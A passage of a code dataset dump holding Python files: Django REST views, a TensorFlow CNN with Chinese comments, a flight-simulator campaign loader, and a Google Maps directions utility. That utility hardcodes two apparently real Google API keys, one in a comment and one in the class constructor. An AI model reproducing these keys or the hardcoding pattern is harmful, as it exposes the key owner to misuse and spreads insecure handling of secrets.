[TemplateHTMLRenderer]\n template_name = 'ui/resource.html'\n\n def get_object(self):\n obj = super().get_object()\n obj.profile = self.get_profile()\n return obj\n\n\nclass MediaView(ResourcePageMixin, apiviews.MediaItemMixin, generics.RetrieveAPIView):\n \"\"\"View for rendering an individual media item. Extends the DRF's media item view.\"\"\"\n serializer_class = serializers.MediaItemPageSerializer\n template_name = 'ui/media.html'\n\n\nclass MediaItemAnalyticsView(ResourcePageMixin, apiviews.MediaItemMixin, generics.RetrieveAPIView):\n \"\"\"\n View for rendering an individual media item's analytics.\n Extends the DRF's media item analytics view.\n\n \"\"\"\n serializer_class = serializers.ResourcePageSerializer\n\n\nclass ChannelView(ResourcePageMixin, apiviews.ChannelMixin, generics.RetrieveAPIView):\n \"\"\"View for rendering an individual channel. Extends the DRF's channel view.\"\"\"\n serializer_class = serializers.ChannelPageSerializer\n\n\nclass PlaylistView(ResourcePageMixin, apiviews.PlaylistMixin, generics.RetrieveAPIView):\n \"\"\"View for rendering an individual playlist. Extends the DRF's channel view.\"\"\"\n serializer_class = serializers.PlaylistPageSerializer\n","sub_path":"ui/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"148221814","text":"##\n# API KEY AIzaSyAY1aatbdVCglJhXI0HFddm5pEkPTUpBFU\n#python3.6\n# importing required libraries\nimport sys \n\n\"\"\"\nusing Google Maps API to get directions from \\\n\n- start point to end end_point\n- purpose is\n- - to grab the distance in miles from start to end_point\n- - to grab time in hours and minutes from start to end point\n\n\"\"\"\nimport requests, json\n\n\nclass GoogleMapsUtility():\n def __init__(self):\n self.api_key = 'AIzaSyAlFOfYJqGZR3a_5VcbrihyaproXXWTeY4'\n\n def directionsRequest(self, start_point, end_point):\n try:\n # url variable store url\n url ='https://maps.googleapis.com/maps/api/directions/json'\n # Get method of requests module\n payload = {'key':self.api_key,'origin':start_point,'destination':end_point}\n # makes google directions API requests\n response = requests.get(url,params=payload)\n # grabs JSON object from API request\n data = response.json()\n # checks if the status is successful\n if response.status_code == 200:\n # iterates throught the JSON object\n for directions in data['routes'][0]['legs']:\n # gets distance dictionary from json\n distance = directions['distance']\n # gets duration dictionary from json\n duration = directions['duration']\n # get the value from distance\n distance_miles = distance.get(\"value\") #meters\n # get the value from duration\n duration_hours = duration.get(\"value\") #seconds\n return int(distance_miles), int(duration_hours)\n\n elif response.status_code != 200:\n print(response.status_code)\n print(response.json())\n return response.status_code\n \n except:\n sys.exit(\"Something went wrong! Try again.\")","sub_path":"contents/google_maps_utility.py","file_name":"google_maps_utility.py","file_ext":"py","file_size_in_byte":1958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"594157382","text":"import tensorflow as tf\n\ndef inference(images, batch_size, n_classess):\n # conv1,shape=[kernel size, kernel size, channels, kernel numbers]\n # 第一个卷积层\n # tf.variable_scope() 主要结合 tf.get_variable() 来使用,实现变量共享。下次调用不用重新产生,这样可以保存参数\n with tf.variable_scope('conv1') as scope:\n #初始化权重,[3,3,3,16]\n weights = tf.get_variable('weights', shape = [3, 3, 3, 16], dtype = tf.float32,\n initializer = tf.truncated_normal_initializer(stddev=0.1, dtype=tf.float32))\n #tf.truncated_normal随机数生成函数,此外还有tf.random_normal, tf.random_uniform, tf.random_gamma\n #初始化偏置,16个\n biases = tf.get_variable('biases', shape=[16], dtype = tf.float32,\n initializer = tf.constant_initializer(0.1))\n #tf.constant_initializer初始化常数,通常偏置项都是用它初始化\n # 实现卷积运算,第一个参数输入图像,[batch, in_height, in_width, in_channels]这样的shape,\n # 具体含义是[训练时一个batch的图片数量, 图片高度, 图片宽度, 图像通道数],注意这是一个4维的Tensor,要求类型为float32和float64其中之一\n # 第二个参数filter:相当于CNN中的卷积核,它要求是一个Tensor,具有[filter_height, filter_width, in_channels, out_channels]这样的shape,\n # 具体含义是[卷积核的高度,卷积核的宽度,图像通道数,卷积核个数],\n # 第三个参数strides:卷积时在图像每一维的步长,这是一个一维的向量,长度4\n # 第四个参数padding:string类型的量,只能是\"SAME\",\"VALID\"其中之一,这个值决定了不同的卷积方式\n # 结果返回一个Tensor,这个输出,就是我们常说的feature map,shape仍然是[batch, height, width, channels]这种形式\n conv = tf.nn.conv2d(images, weights, strides=[1,1,1,1], padding='SAME')\n # 将偏置加在所得的值上面\n pre_activation = tf.nn.bias_add(conv, biases)\n # 将计算结果通过relu激活函数完成去线性化\n conv1 = tf.nn.relu(pre_activation, name= scope.name)\n \n # pool1 and norm1\n # 池化层\n with tf.variable_scope('pooling1_lrn') as scope:\n # tf.nn.max_pool实现了最大池化层的前向传播过程,参数和conv2d类似,ksize过滤器的尺寸\n pool1 = tf.nn.max_pool(conv1, ksize=[1,3,3,1],strides=[1,2,2,1],padding='SAME',name='poolong1')\n # 局部响应归一化(Local Response Normalization),一般用于激活,池化后的一种提高准确度的方法。\n norm1 = tf.nn.lrn(pool1, depth_radius=4, bias=1, alpha=0.001/9.0, beta=0.75, name='norm1')\n \n # conv2第二卷积层\n # 计算过程和第一层一样,唯一区别为命名空间\n with tf.variable_scope('conv2') as scope:\n weights = tf.get_variable('weights', shape=[3,3,16,16], dtype=tf.float32, initializer=tf.truncated_normal_initializer(stddev=0.1,dtype=tf.float32))\n biases = tf.get_variable('biases',\n shape=[16], \n dtype=tf.float32,\n initializer=tf.constant_initializer(0.1))\n conv = tf.nn.conv2d(norm1, weights, strides=[1,1,1,1],padding='SAME')\n pre_activation = tf.nn.bias_add(conv, biases)\n conv2 = tf.nn.relu(pre_activation, name='conv2')\n \n # pool2 and norm2第二池化层\n with tf.variable_scope('pooling2_lrn') as scope:\n norm2 = tf.nn.lrn(conv2, depth_radius=4,bias=1,alpha=0.001/9,beta=0.75,name='norm2')\n pool2 = tf.nn.max_pool(norm2, ksize=[1,3,3,1],strides=[1,1,1,1],padding='SAME',name='pooling2')\n \n \n # local3全连接层\n with tf.variable_scope('local3') as scope:\n # -1代表的含义是不用我们自己指定这一维的大小,函数会自动计算\n reshape = tf.reshape(pool2, shape=[batch_size, -1])\n # 获得reshape的列数,矩阵点乘要满足列数等于行数\n dim = reshape.get_shape()[1].value\n weights = tf.get_variable('weights', shape=[dim,128],dtype=tf.float32,initializer=tf.truncated_normal_initializer(stddev=0.005,dtype=tf.float32))\n biases = tf.get_variable('biases',shape=[128], dtype=tf.float32,initializer=tf.constant_initializer(0.1))\n local3 = tf.nn.relu(tf.matmul(reshape, weights) + biases, name=scope.name)\n \n # local4全连接层\n with tf.variable_scope('local4') as scope:\n weights = tf.get_variable('weights',shape=[128,128],dtype=tf.float32,initializer=tf.truncated_normal_initializer(stddev=0.005,dtype=tf.float32))\n biases = tf.get_variable('biases', shape=[128],dtype=tf.float32, initializer=tf.constant_initializer(0.1))\n local4 = tf.nn.relu(tf.matmul(local3,weights) + biases, name = 'local4')\n # softmax逻辑回归\n with tf.variable_scope('softmax_linear') as scope:\n weights = tf.get_variable('softmax_linear',shape=[128, n_classess],dtype=tf.float32,initializer=tf.truncated_normal_initializer(stddev=0.005,dtype=tf.float32))\n biases = tf.get_variable('biases',shape=[n_classess],dtype=tf.float32,initializer=tf.constant_initializer(0.1))\n softmax_linear = tf.add(tf.matmul(local4, weights),biases,name='softmax_linear')\n \n return softmax_linear\n# 定义损失函数,定义传入值和标准值的差距\ndef losses(logits, labels):\n with tf.variable_scope('loss') as scope:\n # 计算使用了softmax回归后的交叉熵损失函数\n # logits表示神经网络的输出结果,labels表示标准答案\n cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits, labels=labels,name='xentropy_per_example')\n # 求cross_entropy所有元素的平均值\n loss = tf.reduce_mean(cross_entropy, name='loss')\n # 对loss值进行标记汇总,一般在画loss, accuary时会用到这个函数。\n tf.summary.scalar(scope.name+'/loss',loss)\n return loss\n# 通过梯度下降法为最小化损失函数增加了相关的优化操作\ndef trainning(loss, learning_rate):\n with tf.name_scope('optimizer'):\n # 在训练过程中,先实例化一个优化函数,比如tf.train.GradientDescentOptimizer,并基于一定的学习率进行梯度优化训练\n optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)\n # 设置一个用于记录全局训练步骤的单值\n global_step = tf.Variable(0, name='global_step',trainable=False)\n # 添加操作节点,用于最小化loss,并更新var_list,返回为一个优化更新后的var_list,如果global_step非None,该操作还会为global_step做自增操作\n train_op = optimizer.minimize(loss, global_step=global_step)\n return train_op\n\n# 定义评价函数,返回准确率\ndef evaluation(logits, labels):\n with tf.variable_scope('accuracy') as scope:\n correct = tf.nn.in_top_k(logits,labels,1) # 计算预测的结果和实际结果的是否相等,返回一个bool类型的张量\n # K表示每个样本的预测结果的前K个最大的数里面是否含有target中的值。一般都是取1。\n # 转换类型\n correct = tf.cast(correct, tf.float16)\n accuracy = tf.reduce_mean(correct) #取平均值,也就是准确率\n # 对准确度进行标记汇总\n tf.summary.scalar(scope.name+'/accuracy',accuracy)\n return accuracy\n\n\n \n \n \n \n \n \n \n \n \n \n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":7642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"320357212","text":"from __future__ import annotations\n\nimport itertools\nimport json\nimport logging\nfrom dataclasses import dataclass\nfrom functools import cached_property\nfrom itertools import tee\nfrom pathlib import Path\nfrom typing import Any, Dict, Iterator, List, Optional, Set, Tuple, Union, cast\n\nfrom shapely import geometry\nfrom shapely import ops\n\nfrom dcs import Mission\nfrom dcs.countries import (\n CombinedJointTaskForcesBlue,\n CombinedJointTaskForcesRed,\n)\nfrom dcs.country import Country\nfrom dcs.mapping import Point\nfrom dcs.planes import F_15C\nfrom dcs.ships import (\n CVN_74_John_C__Stennis,\n LHA_1_Tarawa,\n USS_Arleigh_Burke_IIa,\n)\nfrom dcs.statics import Fortification\nfrom dcs.terrain import (\n caucasus,\n nevada,\n normandy,\n persiangulf,\n syria,\n thechannel,\n)\nfrom dcs.terrain.terrain import Airport, Terrain\nfrom dcs.unitgroup import (\n FlyingGroup,\n Group,\n ShipGroup,\n StaticGroup,\n VehicleGroup,\n)\nfrom dcs.vehicles import AirDefence, Armor, MissilesSS, Unarmed\n\nfrom gen.flights.flight import FlightType\nfrom .controlpoint import (\n Airfield,\n Carrier,\n ControlPoint,\n Lha,\n MissionTarget,\n OffMapSpawn,\n Fob,\n)\nfrom .landmap import Landmap, load_landmap, poly_contains\nfrom ..utils import nm_to_meter\n\nNumeric = Union[int, float]\n\nSIZE_TINY = 150\nSIZE_SMALL = 600\nSIZE_REGULAR = 1000\nSIZE_BIG = 2000\nSIZE_LARGE = 3000\n\nIMPORTANCE_LOW = 1\nIMPORTANCE_MEDIUM = 1.2\nIMPORTANCE_HIGH = 1.4\n\nFRONTLINE_MIN_CP_DISTANCE = 5000\n\ndef pairwise(iterable):\n \"\"\"\n itertools recipe\n s -> (s0,s1), (s1,s2), (s2, s3), ...\n \"\"\"\n a, b = tee(iterable)\n next(b, None)\n return zip(a, b)\n\n\nclass MizCampaignLoader:\n BLUE_COUNTRY = CombinedJointTaskForcesBlue()\n RED_COUNTRY = CombinedJointTaskForcesRed()\n\n OFF_MAP_UNIT_TYPE = F_15C.id\n\n CV_UNIT_TYPE = CVN_74_John_C__Stennis.id\n LHA_UNIT_TYPE = LHA_1_Tarawa.id\n FRONT_LINE_UNIT_TYPE = Armor.APC_M113.id\n\n FOB_UNIT_TYPE = Unarmed.CP_SKP_11_ATC_Mobile_Command_Post.id\n\n EWR_UNIT_TYPE = AirDefence.EWR_55G6.id\n SAM_UNIT_TYPE = AirDefence.SAM_SA_10_S_300PS_SR_64H6E.id\n GARRISON_UNIT_TYPE = AirDefence.SAM_SA_19_Tunguska_2S6.id\n OFFSHORE_STRIKE_TARGET_UNIT_TYPE = Fortification.Oil_platform.id\n SHIP_UNIT_TYPE = USS_Arleigh_Burke_IIa.id\n MISSILE_SITE_UNIT_TYPE = MissilesSS.SRBM_SS_1C_Scud_B_9K72_LN_9P117M.id\n COASTAL_DEFENSE_UNIT_TYPE = MissilesSS.SS_N_2_Silkworm.id\n\n # Multiple options for the required SAMs so campaign designers can more\n # accurately see the coverage of their IADS for the expected type.\n REQUIRED_LONG_RANGE_SAM_UNIT_TYPES = {\n AirDefence.SAM_Patriot_LN_M901.id,\n AirDefence.SAM_SA_10_S_300PS_LN_5P85C.id,\n AirDefence.SAM_SA_10_S_300PS_LN_5P85D.id,\n }\n\n REQUIRED_MEDIUM_RANGE_SAM_UNIT_TYPES = {\n AirDefence.SAM_Hawk_LN_M192.id,\n AirDefence.SAM_SA_2_LN_SM_90.id,\n AirDefence.SAM_SA_3_S_125_LN_5P73.id,\n }\n\n BASE_DEFENSE_RADIUS = nm_to_meter(2)\n\n def __init__(self, miz: Path, theater: ConflictTheater) -> None:\n self.theater = theater\n self.mission = Mission()\n self.mission.load_file(str(miz))\n self.control_point_id = itertools.count(1000)\n\n # If there are no red carriers there usually aren't red units. Make sure\n # both countries are initialized so we don't have to deal with None.\n if self.mission.country(self.BLUE_COUNTRY.name) is None:\n self.mission.coalition[\"blue\"].add_country(self.BLUE_COUNTRY)\n if self.mission.country(self.RED_COUNTRY.name) is None:\n self.mission.coalition[\"red\"].add_country(self.RED_COUNTRY)\n\n @staticmethod\n def control_point_from_airport(airport: Airport) -> ControlPoint:\n\n # The wiki says this is a legacy property and to just use regular.\n size = SIZE_REGULAR\n\n # The importance is taken from the periodicity of the airport's\n # warehouse divided by 10. 30 is the default, and out of range (valid\n # values are between 1.0 and 1.4). If it is used, pick the default\n # importance.\n if airport.periodicity == 30:\n importance = IMPORTANCE_MEDIUM\n else:\n importance = airport.periodicity / 10\n\n cp = Airfield(airport, size, importance)\n cp.captured = airport.is_blue()\n\n # Use the unlimited aircraft option to determine if an airfield should\n # be owned by the player when the campaign is \"inverted\".\n cp.captured_invert = airport.unlimited_aircrafts\n\n return cp\n\n def country(self, blue: bool) -> Country:\n country = self.mission.country(\n self.BLUE_COUNTRY.name if blue else self.RED_COUNTRY.name)\n # Should be guaranteed because we initialized them.\n assert country\n return country\n\n @property\n def blue(self) -> Country:\n return self.country(blue=True)\n\n @property\n def red(self) -> Country:\n return self.country(blue=False)\n\n def off_map_spawns(self, blue: bool) -> Iterator[FlyingGroup]:\n for group in self.country(blue).plane_group:\n if group.units[0].type == self.OFF_MAP_UNIT_TYPE:\n yield group\n\n def carriers(self, blue: bool) -> Iterator[ShipGroup]:\n for group in self.country(blue).ship_group:\n if group.units[0].type == self.CV_UNIT_TYPE:\n yield group\n\n def lhas(self, blue: bool) -> Iterator[ShipGroup]:\n for group in self.country(blue).ship_group:\n if group.units[0].type == self.LHA_UNIT_TYPE:\n yield group\n \n def fobs(self, blue: bool) -> Iterator[VehicleGroup]:\n for group in self.country(blue).vehicle_group:\n if group.units[0].type == self.FOB_UNIT_TYPE:\n yield group\n\n @property\n def ships(self) -> Iterator[ShipGroup]:\n for group in self.blue.ship_group:\n if group.units[0].type == self.SHIP_UNIT_TYPE:\n yield group\n\n @property\n def ewrs(self) -> Iterator[VehicleGroup]:\n for group in self.blue.vehicle_group:\n if group.units[0].type == self.EWR_UNIT_TYPE:\n yield group\n\n @property\n def sams(self) -> Iterator[VehicleGroup]:\n for group in self.blue.vehicle_group:\n if group.units[0].type == self.SAM_UNIT_TYPE:\n yield group\n\n @property\n def garrisons(self) -> Iterator[VehicleGroup]:\n for group in self.blue.vehicle_group:\n if group.units[0].type == self.GARRISON_UNIT_TYPE:\n yield group\n\n @property\n def offshore_strike_targets(self) -> Iterator[StaticGroup]:\n for group in self.blue.static_group:\n if group.units[0].type == self.OFFSHORE_STRIKE_TARGET_UNIT_TYPE:\n yield group\n\n @property\n def missile_sites(self) -> Iterator[VehicleGroup]:\n for group in self.blue.vehicle_group:\n if group.units[0].type == self.MISSILE_SITE_UNIT_TYPE:\n yield group\n\n @property\n def coastal_defenses(self) -> Iterator[VehicleGroup]:\n for group in self.blue.vehicle_group:\n if group.units[0].type == self.COASTAL_DEFENSE_UNIT_TYPE:\n yield group\n\n @property\n def required_long_range_sams(self) -> Iterator[VehicleGroup]:\n for group in self.red.vehicle_group:\n if group.units[0].type in self.REQUIRED_LONG_RANGE_SAM_UNIT_TYPES:\n yield group\n\n @property\n def required_medium_range_sams(self) -> Iterator[VehicleGroup]:\n for group in self.red.vehicle_group:\n if group.units[0].type in self.REQUIRED_MEDIUM_RANGE_SAM_UNIT_TYPES:\n yield group\n\n @cached_property\n def control_points(self) -> Dict[int, ControlPoint]:\n control_points = {}\n for airport in self.mission.terrain.airport_list():\n if airport.is_blue() or airport.is_red():\n control_point = self.control_point_from_airport(airport)\n control_points[control_point.id] = control_point\n\n for blue in (False, True):\n for group in self.off_map_spawns(blue):\n control_point = OffMapSpawn(next(self.control_point_id),\n str(group.name), group.position)\n control_point.captured = blue\n control_point.captured_invert = group.late_activation\n control_points[control_point.id] = control_point\n for group in self.carriers(blue):\n # TODO: Name the carrier.\n control_point = Carrier(\n \"carrier\", group.position, next(self.control_point_id))\n control_point.captured = blue\n control_point.captured_invert = group.late_activation\n control_points[control_point.id] = control_point\n for group in self.lhas(blue):\n # TODO: Name the LHA.\n control_point = Lha(\n \"lha\", group.position, next(self.control_point_id))\n control_point.captured = blue\n control_point.captured_invert = group.late_activation\n control_points[control_point.id] = control_point\n for group in self.fobs(blue):\n control_point = Fob(\n str(group.name), group.position, next(self.control_point_id)\n )\n control_point.captured = blue\n control_point.captured_invert = group.late_activation\n control_points[control_point.id] = control_point\n\n return control_points\n\n @property\n def front_line_path_groups(self) -> Iterator[VehicleGroup]:\n for group in self.country(blue=True).vehicle_group:\n if group.units[0].type == self.FRONT_LINE_UNIT_TYPE:\n yield group\n\n @cached_property\n def front_lines(self) -> Dict[str, ComplexFrontLine]:\n # Dict of front line ID to a front line.\n front_lines = {}\n for group in self.front_line_path_groups:\n # The unit will have its first waypoint at the source CP and the\n # final waypoint at the destination CP. Intermediate waypoints\n # define the curve of the front line.\n waypoints = [p.position for p in group.points]\n origin = self.theater.closest_control_point(waypoints[0])\n if origin is None:\n raise RuntimeError(\n f\"No control point near the first waypoint of {group.name}\")\n destination = self.theater.closest_control_point(waypoints[-1])\n if destination is None:\n raise RuntimeError(\n f\"No control point near the final waypoint of {group.name}\")\n\n # Snap the begin and end points to the control points.\n waypoints[0] = origin.position\n waypoints[-1] = destination.position\n front_line_id = f\"{origin.id}|{destination.id}\"\n front_lines[front_line_id] = ComplexFrontLine(origin, waypoints)\n self.control_points[origin.id].connect(\n self.control_points[destination.id])\n self.control_points[destination.id].connect(\n self.control_points[origin.id])\n return front_lines\n\n def objective_info(self, group: Group) -> Tuple[ControlPoint, int]:\n closest = self.theater.closest_control_point(group.position)\n distance = closest.position.distance_to_point(group.position)\n return closest, distance\n\n def add_preset_locations(self) -> None:\n for group in self.garrisons:\n closest, distance = self.objective_info(group)\n if distance < self.BASE_DEFENSE_RADIUS:\n closest.preset_locations.base_garrisons.append(group.position)\n else:\n logging.warning(\n f\"Found garrison unit too far from base: {group.name}\")\n\n for group in self.sams:\n closest, distance = self.objective_info(group)\n if distance < self.BASE_DEFENSE_RADIUS:\n closest.preset_locations.base_air_defense.append(group.position)\n else:\n closest.preset_locations.strike_locations.append(group.position)\n\n for group in self.ewrs:\n closest, distance = self.objective_info(group)\n closest.preset_locations.ewrs.append(group.position)\n\n for group in self.offshore_strike_targets:\n closest, distance = self.objective_info(group)\n closest.preset_locations.offshore_strike_locations.append(\n group.position)\n\n for group in self.ships:\n closest, distance = self.objective_info(group)\n closest.preset_locations.ships.append(group.position)\n\n for group in self.missile_sites:\n closest, distance = self.objective_info(group)\n closest.preset_locations.missile_sites.append(group.position)\n\n for group in self.coastal_defenses:\n closest, distance = self.objective_info(group)\n closest.preset_locations.coastal_defenses.append(group.position)\n\n for group in self.required_long_range_sams:\n closest, distance = self.objective_info(group)\n closest.preset_locations.required_long_range_sams.append(\n group.position\n )\n\n for group in self.required_medium_range_sams:\n closest, distance = self.objective_info(group)\n closest.preset_locations.required_medium_range_sams.append(\n group.position\n )\n\n def populate_theater(self) -> None:\n for control_point in self.control_points.values():\n self.theater.add_controlpoint(control_point)\n self.add_preset_locations()\n self.theater.set_frontline_data(self.front_lines)\n\n\n@dataclass\nclass ReferencePoint:\n world_coordinates: Point\n image_coordinates: Point\n\n\nclass ConflictTheater:\n terrain: Terrain\n\n reference_points: Tuple[ReferencePoint, ReferencePoint]\n overview_image: str\n landmap: Optional[Landmap]\n \"\"\"\n land_poly = None # type: Polygon\n \"\"\"\n daytime_map: Dict[str, Tuple[int, int]]\n _frontline_data: Optional[Dict[str, ComplexFrontLine]] = None\n\n def __init__(self):\n self.controlpoints: List[ControlPoint] = []\n self._frontline_data: Optional[Dict[str, ComplexFrontLine]] = None\n \"\"\"\n self.land_poly = geometry.Polygon(self.landmap[0][0])\n for x in self.landmap[1]:\n self.land_poly = self.land_poly.difference(geometry.Polygon(x))\n \"\"\"\n\n @property\n def frontline_data(self) -> Optional[Dict[str, ComplexFrontLine]]:\n if self._frontline_data is None:\n self.load_frontline_data_from_file()\n return self._frontline_data\n\n def load_frontline_data_from_file(self) -> None:\n if self._frontline_data is not None:\n logging.warning(\"Replacing existing frontline data from file\")\n self._frontline_data = FrontLine.load_json_frontlines(self)\n if self._frontline_data is None:\n self._frontline_data = {}\n\n def set_frontline_data(self, data: Dict[str, ComplexFrontLine]) -> None:\n if self._frontline_data is not None:\n logging.warning(\"Replacing existing frontline data\")\n self._frontline_data = data\n\n def add_controlpoint(self, point: ControlPoint,\n connected_to: Optional[List[ControlPoint]] = None):\n if connected_to is None:\n connected_to = []\n for connected_point in connected_to:\n point.connect(to=connected_point)\n\n self.controlpoints.append(point)\n\n def find_ground_objects_by_obj_name(self, obj_name):\n found = []\n for cp in self.controlpoints:\n for g in cp.ground_objects:\n if g.obj_name == obj_name:\n found.append(g)\n return found\n\n def is_in_sea(self, point: Point) -> bool:\n if not self.landmap:\n return False\n\n if self.is_on_land(point):\n return False\n\n for exclusion_zone in self.landmap[1]:\n if poly_contains(point.x, point.y, exclusion_zone):\n return False\n\n for sea in self.landmap[2]:\n if poly_contains(point.x, point.y, sea):\n return True\n\n return False\n\n def is_on_land(self, point: Point) -> bool:\n if not self.landmap:\n return True\n\n is_point_included = False\n for inclusion_zone in self.landmap[0]:\n if poly_contains(point.x, point.y, inclusion_zone):\n is_point_included = True\n\n if not is_point_included:\n return False\n\n for exclusion_zone in self.landmap[1]:\n if poly_contains(point.x, point.y, exclusion_zone):\n return False\n\n return True\n\n def nearest_land_pos(self, point: Point, extend_dist: int = 50) -> Point:\n \"\"\"Returns the nearest point inside a land exclusion zone from point\n `extend_dist` determines how far inside the zone the point should be placed\"\"\"\n if self.is_on_land(point):\n return point\n point = geometry.Point(point.x, point.y)\n nearest_points = []\n if not self.landmap:\n raise RuntimeError(\"Landmap not initialized\")\n for inclusion_zone in self.landmap[0]:\n nearest_pair = ops.nearest_points(point, inclusion_zone)\n nearest_points.append(nearest_pair[1])\n min_distance = point.distance(nearest_points[0]) # type: geometry.Point\n nearest_point = nearest_points[0] # type: geometry.Point\n for pt in nearest_points[1:]:\n distance = point.distance(pt)\n if distance < min_distance:\n min_distance = distance\n nearest_point = pt\n assert isinstance(nearest_point, geometry.Point)\n point = Point(point.x, point.y)\n nearest_point = Point(nearest_point.x, nearest_point.y)\n new_point = point.point_from_heading(\n point.heading_between_point(nearest_point),\n point.distance_to_point(nearest_point) + extend_dist\n )\n return new_point\n\n def control_points_for(self, player: bool) -> Iterator[ControlPoint]:\n for point in self.controlpoints:\n if point.captured == player:\n yield point\n\n def player_points(self) -> List[ControlPoint]:\n return list(self.control_points_for(player=True))\n\n def conflicts(self, from_player=True) -> Iterator[FrontLine]:\n for cp in [x for x in self.controlpoints if x.captured == from_player]:\n for connected_point in [x for x in cp.connected_points if x.captured != from_player]:\n yield FrontLine(cp, connected_point, self)\n\n def enemy_points(self) -> List[ControlPoint]:\n return list(self.control_points_for(player=False))\n\n def closest_control_point(self, point: Point) -> ControlPoint:\n closest = self.controlpoints[0]\n closest_distance = point.distance_to_point(closest.position)\n for control_point in self.controlpoints[1:]:\n distance = point.distance_to_point(control_point.position)\n if distance < closest_distance:\n closest = control_point\n closest_distance = distance\n return closest\n \n def closest_opposing_control_points(self) -> Tuple[ControlPoint, ControlPoint]:\n \"\"\"\n Returns a tuple of the two nearest opposing ControlPoints in theater.\n (player_cp, enemy_cp)\n \"\"\"\n all_cp_min_distances = {}\n for idx, control_point in enumerate(self.controlpoints):\n distances = {}\n closest_distance = None\n for i, cp in enumerate(self.controlpoints):\n if i != idx and cp.captured is not control_point.captured:\n dist = cp.position.distance_to_point(control_point.position)\n if not closest_distance:\n closest_distance = dist\n distances[cp.id] = dist\n if dist < closest_distance:\n distances[cp.id] = dist\n closest_cp_id = min(distances, key=distances.get) # type: ignore\n\n all_cp_min_distances[(control_point.id, closest_cp_id)] = distances[closest_cp_id]\n closest_opposing_cps = [\n self.find_control_point_by_id(i)\n for i\n in min(all_cp_min_distances, key=all_cp_min_distances.get) # type: ignore\n ] # type: List[ControlPoint]\n assert len(closest_opposing_cps) == 2\n if closest_opposing_cps[0].captured:\n return cast(Tuple[ControlPoint, ControlPoint], tuple(closest_opposing_cps))\n else:\n return cast(Tuple[ControlPoint, ControlPoint], tuple(reversed(closest_opposing_cps)))\n\n def find_control_point_by_id(self, id: int) -> ControlPoint:\n for i in self.controlpoints:\n if i.id == id:\n return i\n raise RuntimeError(f\"Cannot find ControlPoint with ID {id}\")\n\n def add_json_cp(self, theater, p: dict) -> ControlPoint:\n cp: ControlPoint\n if p[\"type\"] == \"airbase\":\n\n airbase = theater.terrain.airports[p[\"id\"]]\n\n if \"size\" in p.keys():\n size = p[\"size\"]\n else:\n size = SIZE_REGULAR\n\n if \"importance\" in p.keys():\n importance = p[\"importance\"]\n else:\n importance = IMPORTANCE_MEDIUM\n\n cp = Airfield(airbase, size, importance)\n elif p[\"type\"] == \"carrier\":\n cp = Carrier(\"carrier\", Point(p[\"x\"], p[\"y\"]), p[\"id\"])\n else:\n cp = Lha(\"lha\", Point(p[\"x\"], p[\"y\"]), p[\"id\"])\n\n if \"captured_invert\" in p.keys():\n cp.captured_invert = p[\"captured_invert\"]\n else:\n cp.captured_invert = False\n\n return cp\n \n @staticmethod\n def from_json(directory: Path, data: Dict[str, Any]) -> ConflictTheater:\n theaters = {\n \"Caucasus\": CaucasusTheater,\n \"Nevada\": NevadaTheater,\n \"Persian Gulf\": PersianGulfTheater,\n \"Normandy\": NormandyTheater,\n \"The Channel\": TheChannelTheater,\n \"Syria\": SyriaTheater,\n }\n theater = theaters[data[\"theater\"]]\n t = theater()\n\n miz = data.get(\"miz\", None)\n if miz is not None:\n MizCampaignLoader(directory / miz, t).populate_theater()\n return t\n\n cps = {}\n for p in data[\"player_points\"]:\n cp = t.add_json_cp(theater, p)\n cp.captured = True\n cps[p[\"id\"]] = cp\n t.add_controlpoint(cp)\n\n for p in data[\"enemy_points\"]:\n cp = t.add_json_cp(theater, p)\n cps[p[\"id\"]] = cp\n t.add_controlpoint(cp)\n\n for l in data[\"links\"]:\n cps[l[0]].connect(cps[l[1]])\n cps[l[1]].connect(cps[l[0]])\n\n return t\n \n\nclass CaucasusTheater(ConflictTheater):\n terrain = caucasus.Caucasus()\n overview_image = \"caumap.gif\"\n reference_points = (\n ReferencePoint(caucasus.Gelendzhik.position, Point(176, 298)),\n ReferencePoint(caucasus.Batumi.position, Point(1307, 1205)),\n )\n\n landmap = load_landmap(\"resources\\\\caulandmap.p\")\n daytime_map = {\n \"dawn\": (6, 9),\n \"day\": (9, 18),\n \"dusk\": (18, 20),\n \"night\": (0, 5),\n }\n\n\nclass PersianGulfTheater(ConflictTheater):\n terrain = persiangulf.PersianGulf()\n overview_image = \"persiangulf.gif\"\n reference_points = (\n ReferencePoint(persiangulf.Jiroft_Airport.position,\n Point(1692, 1343)),\n ReferencePoint(persiangulf.Liwa_Airbase.position, Point(358, 3238)),\n )\n landmap = load_landmap(\"resources\\\\gulflandmap.p\")\n daytime_map = {\n \"dawn\": (6, 8),\n \"day\": (8, 16),\n \"dusk\": (16, 18),\n \"night\": (0, 5),\n }\n\n\nclass NevadaTheater(ConflictTheater):\n terrain = nevada.Nevada()\n overview_image = \"nevada.gif\"\n reference_points = (\n ReferencePoint(nevada.Mina_Airport_3Q0.position, Point(252, 295)),\n ReferencePoint(nevada.Laughlin_Airport.position, Point(844, 909)),\n )\n landmap = load_landmap(\"resources\\\\nevlandmap.p\")\n daytime_map = {\n \"dawn\": (4, 6),\n \"day\": (6, 17),\n \"dusk\": (17, 18),\n \"night\": (0, 5),\n }\n\n\nclass NormandyTheater(ConflictTheater):\n terrain = normandy.Normandy()\n overview_image = \"normandy.gif\"\n reference_points = (\n ReferencePoint(normandy.Needs_Oar_Point.position, Point(515, 329)),\n ReferencePoint(normandy.Evreux.position, Point(2029, 1709)),\n )\n landmap = load_landmap(\"resources\\\\normandylandmap.p\")\n daytime_map = {\n \"dawn\": (6, 8),\n \"day\": (10, 17),\n \"dusk\": (17, 18),\n \"night\": (0, 5),\n }\n\n\nclass TheChannelTheater(ConflictTheater):\n terrain = thechannel.TheChannel()\n overview_image = \"thechannel.gif\"\n reference_points = (\n ReferencePoint(thechannel.Abbeville_Drucat.position, Point(2005, 2390)),\n ReferencePoint(thechannel.Detling.position, Point(706, 382))\n )\n landmap = load_landmap(\"resources\\\\channellandmap.p\")\n daytime_map = {\n \"dawn\": (6, 8),\n \"day\": (10, 17),\n \"dusk\": (17, 